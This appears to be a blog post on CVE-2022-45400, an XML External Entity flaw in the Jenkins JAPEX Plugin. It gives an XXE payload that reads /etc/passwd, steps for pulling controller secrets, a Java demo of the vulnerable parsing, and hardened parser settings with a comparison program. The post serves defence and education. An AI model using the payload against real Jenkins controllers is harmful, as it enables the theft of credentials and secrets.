Published: June 2024
Introduction
A security vulnerability, CVE-2022-45400, has been reported in the Jenkins JAPEX Plugin version 1.7 and earlier. The plugin does not configure its XML parser to block external entity resolution, leaving it exposed to XML External Entity (XXE) attacks. Anyone running this plugin should understand how the vulnerability works, why it is dangerous, and what to do about it.
What is Jenkins JAPEX Plugin?
Jenkins is a popular open-source automation server. The JAPEX Plugin helps users run JAPEX benchmarks inside their Jenkins jobs. It processes XML files for configuration and report generation.
What’s the Problem – CVE-2022-45400?
In versions 1.7 and earlier of the Jenkins JAPEX Plugin, the XML parsing code does *not* disable external entity processing. When the plugin parses a JAPEX report produced by a build, anyone who can influence that report's contents (for example by controlling the build script or the benchmark output) can supply XML that declares an external entity. The parser then resolves that entity itself, which lets the attacker read files from the Jenkins controller (secrets, credentials, configuration) or make the controller issue requests to internal addresses (server-side request forgery). Classic entity-expansion payloads can also exhaust parser memory and take the controller down.
A JAXP parser created with default settings resolves external entities declared in the document's DTD. Consider this minimal example:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
If the parser is not secured, it replaces &xxe; with the contents of /etc/passwd. The attacker only needs to get this document in front of the parser, which for the JAPEX Plugin means placing it where the plugin expects a JAPEX report file to be.
The vulnerable pattern in a plugin like this looks as follows (illustrative, using the JAXP defaults):
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = dbf.newDocumentBuilder();
    Document doc = db.parse(xmlInput); // xmlInput is attacker-influenced report content
What's missing? Any configuration on the factory that forbids DOCTYPE declarations or external entity resolution.
Let's see how an attacker could exploit this:
1. Craft malicious XML: The attacker builds a JAPEX report XML like the one above, pointing the entity at a sensitive file on the controller (say, the Jenkins master key or a credentials file) or at an internal URL.
2. Trigger parsing: The attacker gets that content into the report file the plugin reads, typically by controlling the build step or the benchmark that generates the report.
3. Get data back: If the plugin renders, stores or logs the parsed content (in the report view, in build output, or in an error message), the attacker reads the file contents from there.
Here's how to reproduce the vulnerable parsing behaviour in plain Java:
    import javax.xml.parsers.*;
    import org.w3c.dom.*;
    import java.io.*;
    import java.nio.charset.StandardCharsets;

    public class XXEVulnDemo {
        public static void main(String[] args) throws Exception {
            // Attacker-controlled document: declares an external entity backed by a local file.
            String evilXML = "<?xml version=\"1.0\"?>" +
                "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>" +
                "<foo>&xxe;</foo>";
            // Default JAXP factory: no security features enabled, external entities are resolved.
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            DocumentBuilder db = dbf.newDocumentBuilder();
            InputStream xmlInput = new ByteArrayInputStream(evilXML.getBytes(StandardCharsets.UTF_8));
            Document doc = db.parse(xmlInput);
            // The entity reference has been replaced by the file contents.
            System.out.println(doc.getDocumentElement().getTextContent());
        }
    }
Run this and you’ll see your /etc/passwd file printed (if on Linux)! JAPEX Plugin made the same mistake.
Patches & Fixes
The Jenkins Security Advisory of 2022-11-15 covers this issue; check the advisory for the current fix status and the version it names before relying on an upgrade, and if no fixed release is available, remove the plugin or make sure no untrusted party can influence the report files it parses. The correct fix on the code side is to configure the DocumentBuilderFactory to reject DOCTYPE declarations and, as defence in depth, to disable every other path to external resources:
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
Rejecting the DOCTYPE outright is the single setting that stops XXE; the remaining features matter when a parser implementation does not support disallow-doctype-decl or when DTDs must be accepted for legitimate input. Apply the same configuration to any SAXParserFactory, XMLInputFactory or Transformer the plugin uses, since each has its own parser.
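The following stand-alone Java program is an added example, not code from the JAPEX Plugin or the Jenkins project: it parses the same kind of XXE payload first with a default JAXP factory and then with the hardened configuration above, so you can see the difference on your own JDK. It writes a constructed secret to a temporary file instead of reading /etc/passwd so that it runs on any OS, and it uses the JAXP 1.5 access-restriction attributes (`XMLConstants.ACCESS_EXTERNAL_DTD` / `ACCESS_EXTERNAL_SCHEMA`) in addition to the feature flags shown above. `Files.writeString` requires Java 11 or later.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class XxeHardeningDemo {

    // Unhardened factory: the JDK default, which resolves external entities.
    // This is the pattern the vulnerable plugin uses.
    static DocumentBuilder vulnerableBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened factory: forbid DOCTYPE declarations outright and, as defence in depth,
    // close every other path by which the parser could fetch an external resource.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        // JAXP 1.5 access restrictions: an empty string allows no protocol at all.
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return dbf.newDocumentBuilder();
    }

    // Stand-in for the plugin's report handling: parse the document and return
    // the root element's text content.
    static String parseReportText(DocumentBuilder db, String xml) throws Exception {
        Document doc = db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed "secret" file so the demo does not depend on /etc/passwd existing.
        Path secret = Files.createTempFile("jenkins-secret", ".txt");
        Files.writeString(secret, "SECRET_TOKEN=abc123");
        try {
            // Hypothetical JAPEX report whose entity points at the secret file.
            String xxe = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE japexReport [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>"
                + "<japexReport>&xxe;</japexReport>";

            // Default factory: the entity is resolved and the secret lands in the DOM.
            System.out.println("vulnerable parser returned: "
                + parseReportText(vulnerableBuilder(), xxe));

            // Hardened factory: Xerces rejects the document at the DOCTYPE declaration,
            // before any entity could be resolved.
            try {
                parseReportText(hardenedBuilder(), xxe);
                System.out.println("hardened parser accepted the document (unexpected)");
            } catch (SAXParseException e) {
                System.out.println("hardened parser rejected it: " + e.getMessage());
            }

            // A legitimate report without a DOCTYPE still parses with the hardened factory.
            String benign = "<?xml version=\"1.0\"?><japexReport>42 ops/s</japexReport>";
            System.out.println("hardened parser on benign input: "
                + parseReportText(hardenedBuilder(), benign));
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with `javac XxeHardeningDemo.java && java XxeHardeningDemo`. The first line of output contains the constructed secret, the second is a parse error mentioning the DOCTYPE, and the third shows that benign input is unaffected. When auditing a plugin, grep for every `newInstance()` on a JAXP factory and confirm that each one goes through a hardening routine like `hardenedBuilder()`.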
References
- Jenkins Security Advisory 2022-11-15 (CVE-2022-45400)
- OWASP: XML External Entity (XXE) Prevention Cheat Sheet
- NIST NVD: CVE-2022-45400
Conclusion
CVE-2022-45400 is a simple but high-impact bug caused by unsafe XML parsing in the Jenkins JAPEX Plugin up to version 1.7. If you run a Jenkins controller with this plugin, follow the advisory's guidance *now* (upgrade if a fixed release is available, otherwise remove the plugin or lock down who can influence its report files), and review your own XML-handling code for the same defaults. Stay secure!
*Feel free to reach out with any questions or share your experience patching this issue!*
Timeline
Published on: 11/15/2022 20:15:00 UTC
Last modified on: 11/20/2022 03:07:00 UTC